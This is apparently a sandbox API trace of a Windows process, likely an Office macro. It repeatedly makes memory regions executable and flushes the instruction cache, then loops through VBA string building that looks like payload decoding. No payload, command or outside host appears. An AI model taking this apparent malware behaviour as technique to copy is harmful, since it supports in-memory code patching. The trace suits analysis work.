[0096.047] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.047] GetCurrentProcess () returned 0xffffffff [0096.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0096.047] GetCurrentProcess () returned 0xffffffff [0096.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0096.047] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.048] GetCurrentProcess () returned 0xffffffff [0096.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0096.048] GetCurrentProcess () returned 0xffffffff [0096.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0096.048] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.049] GetCurrentProcess () returned 0xffffffff [0096.049] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0096.049] GetCurrentProcess () returned 0xffffffff [0096.049] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0096.049] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.050] GetCurrentProcess () returned 0xffffffff [0096.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0096.050] GetCurrentProcess () returned 0xffffffff [0096.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0096.050] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.051] GetCurrentProcess () returned 0xffffffff [0096.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0096.051] GetCurrentProcess () returned 0xffffffff [0096.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0096.051] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.052] GetCurrentProcess () returned 0xffffffff [0096.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0096.052] GetCurrentProcess () returned 0xffffffff [0096.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0096.052] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.052] GetCurrentProcess () returned 0xffffffff [0096.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0096.053] GetCurrentProcess () returned 0xffffffff [0096.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0096.053] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.053] GetCurrentProcess () returned 0xffffffff [0096.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0096.053] GetCurrentProcess () returned 0xffffffff [0096.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0096.053] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.054] GetCurrentProcess () returned 0xffffffff [0096.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0096.054] GetCurrentProcess () returned 0xffffffff [0096.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0096.054] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.097] GetCurrentProcess () returned 0xffffffff [0096.097] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0096.097] GetCurrentProcess () returned 0xffffffff [0096.097] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0096.098] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.098] GetCurrentProcess () returned 0xffffffff [0096.099] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0096.099] GetCurrentProcess () returned 0xffffffff [0096.099] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0096.099] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.100] GetCurrentProcess () returned 0xffffffff [0096.100] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0096.100] GetCurrentProcess () returned 0xffffffff [0096.100] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0096.100] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.100] GetCurrentProcess () returned 0xffffffff [0096.100] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0096.101] GetCurrentProcess () returned 0xffffffff [0096.101] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0096.101] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.102] GetCurrentProcess () returned 0xffffffff [0096.102] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0096.102] GetCurrentProcess () returned 0xffffffff [0096.102] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0096.102] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.103] GetCurrentProcess () returned 0xffffffff [0096.103] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0096.103] GetCurrentProcess () returned 0xffffffff [0096.103] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0096.103] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.104] GetCurrentProcess () returned 0xffffffff [0096.104] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0096.104] GetCurrentProcess () returned 0xffffffff [0096.104] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0096.104] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.105] GetCurrentProcess () returned 0xffffffff [0096.105] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0096.105] SetErrorMode (uMode=0x8001) returned 0x8001 [0096.105] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0096.105] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0096.105] SetErrorMode (uMode=0x8001) returned 0x8001 [0096.106] GetProcAddress (hModule=0x693e0000, lpProcName=0x234) returned 0x695bb15f [0096.107] GetAsyncKeyState (vKey=3) returned 0 [0096.107] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.107] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.107] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.107] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.107] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.107] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.107] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.108] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.109] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.109] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.109] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.109] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.109] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.109] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.109] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.109] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.109] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.109] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.109] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.109] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.109] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.109] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.110] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.110] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.110] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.110] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.110] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.110] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.110] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.110] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.110] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.110] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.110] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.110] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.110] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.110] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.110] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.111] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.111] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.111] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.111] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.111] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.111] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.111] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.111] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.111] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.111] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.111] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.111] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.111] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.111] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.111] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.111] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.111] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.111] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.112] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.112] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.112] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.112] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.112] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.112] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.112] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.112] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.112] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.112] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.112] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.112] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.112] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.112] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.112] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.112] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.112] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.112] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.112] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.113] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.113] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.113] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.113] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.113] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.113] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.113] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.113] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.113] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.113] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.113] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.113] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.113] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.113] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.113] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.114] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.114] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.114] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.114] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.114] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.114] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.114] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.114] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.114] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.114] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.114] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.114] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.114] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.114] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.114] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.114] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.114] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.114] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.114] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.115] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.115] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.115] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.115] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.115] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.115] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.115] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.115] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.115] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.115] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.115] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.115] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.115] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.115] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.115] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.115] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.115] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.115] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.116] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.116] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.116] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.116] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.116] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.116] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.116] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.116] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.116] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.116] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.116] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.116] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.116] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.116] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.116] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.116] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.117] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.117] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.117] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.117] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.117] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.117] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.117] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.117] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.117] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.117] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.138] GetAsyncKeyState (vKey=3) returned 0 [0096.138] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.150] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 